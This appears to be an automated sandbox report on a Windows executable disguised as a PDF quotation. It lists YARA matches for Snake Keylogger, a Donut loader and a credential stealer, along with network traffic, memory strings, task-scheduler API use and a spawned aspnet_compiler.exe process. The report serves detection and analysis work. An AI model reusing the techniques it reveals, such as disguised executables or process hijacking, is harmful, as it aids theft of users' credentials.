            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000000.00000002.2215561209.00000228E70FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: Process Memory Space: aspnet_compiler.exe PID: 7792, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: aspnet_compiler.exe PID: 7792, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeCode function: 0_2_00007FFD9B8951D30_2_00007FFD9B8951D3
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeCode function: 0_2_00007FFD9BAB64520_2_00007FFD9BAB6452
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeCode function: 0_2_00007FFD9BA94C410_2_00007FFD9BA94C41
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeCode function: 0_2_00007FFD9BA97C290_2_00007FFD9BA97C29
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeCode function: 0_2_00007FFD9BA919E10_2_00007FFD9BA919E1
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeCode function: 0_2_00007FFD9BA900600_2_00007FFD9BA90060
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeCode function: 0_2_00007FFD9BAA4F9D0_2_00007FFD9BAA4F9D
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeCode function: 0_2_00007FFD9BAB56A60_2_00007FFD9BAB56A6
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4_2_000001904EEE2B784_2_000001904EEE2B78
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4_2_000001904EEE279C4_2_000001904EEE279C
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4_2_000001904EEE3A5C4_2_000001904EEE3A5C
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4_2_000001904EEE62544_2_000001904EEE6254
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4_2_000001904EEE18C04_2_000001904EEE18C0
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4_2_000001904EEE2FA84_2_000001904EEE2FA8
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeStatic PE information: No import functions for PE file found
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E7016000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000000.1718879374.00000228E4E83000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePzlcy.exeH vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2225576342.00000228FF620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameQhbnw.dll" vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214866648.0000022880380000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeBinary or memory string: OriginalFilenamePzlcy.exeH vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000000.00000002.2215561209.00000228E70FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: Process Memory Space: aspnet_compiler.exe PID: 7792, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: aspnet_compiler.exe PID: 7792, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@4/3
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050F66000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050F75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: QUOTATION_NOVQTRA071244PDF.scr.exeReversingLabs: Detection: 36%
            Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe"
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"Jump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
